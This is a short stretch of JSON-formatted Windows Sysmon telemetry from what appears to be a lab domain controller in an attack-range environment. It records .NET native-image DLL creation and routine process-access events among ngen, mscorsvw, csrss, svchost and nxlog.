{"EventTime":"2020-08-01 07:02:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8571,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:23.841\r\nProcessGuid: {E2A3D6B1-137F-5F25-0000-001078A70F00}\r\nProcessId: 4840\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12e8-1\\System.ServiceModel.Discovery.dll\r\nCreationUtcTime: 2020-08-01 07:02:23.841","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:23.841","ProcessGuid":"{E2A3D6B1-137F-5F25-0000-001078A70F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12e8-1\\System.ServiceModel.Discovery.dll","CreationUtcTime":"2020-08-01 07:02:23.841","EventReceivedTime":"2020-08-01 07:02:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8572,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:23.888\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1365-5F25-0000-0010A96F0E00}\r\nTargetProcessId: 1364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:23.888","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1365-5F25-0000-0010A96F0E00}","TargetProcessId":"1364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8573,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:23.888\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1365-5F25-0000-0010A96F0E00}\r\nTargetProcessId: 1364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:23.888","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1365-5F25-0000-0010A96F0E00}","TargetProcessId":"1364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8574,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:23.888\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1365-5F25-0000-0010A96F0E00}\r\nTargetProcessId: 1364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:23.888","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1365-5F25-0000-0010A96F0E00}","TargetProcessId":"1364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8575,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:23.935\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-137F-5F25-0000-00108EB10F00}\r\nTargetProcessId: 1100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:23.935","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-137F-5F25-0000-00108EB10F00}","TargetProcessId":"1100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8576,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:23.935\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-137F-5F25-0000-00108EB10F00}\r\nTargetProcessId: 1100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:23.935","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-137F-5F25-0000-00108EB10F00}","TargetProcessId":"1100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8577,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:23.935\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-137F-5F25-0000-00108EB10F00}\r\nTargetProcessId: 1100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:23.935","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-137F-5F25-0000-00108EB10F00}","TargetProcessId":"1100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8578,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:24.123\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:24.123","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8579,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:24.419\r\nProcessGuid: {E2A3D6B1-137F-5F25-0000-00108EB10F00}\r\nProcessId: 1100\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\44c-0\\System.ServiceModel.Internals.dll\r\nCreationUtcTime: 2020-08-01 07:02:24.419","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:24.419","ProcessGuid":"{E2A3D6B1-137F-5F25-0000-00108EB10F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\44c-0\\System.ServiceModel.Internals.dll","CreationUtcTime":"2020-08-01 07:02:24.419","EventReceivedTime":"2020-08-01 07:02:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
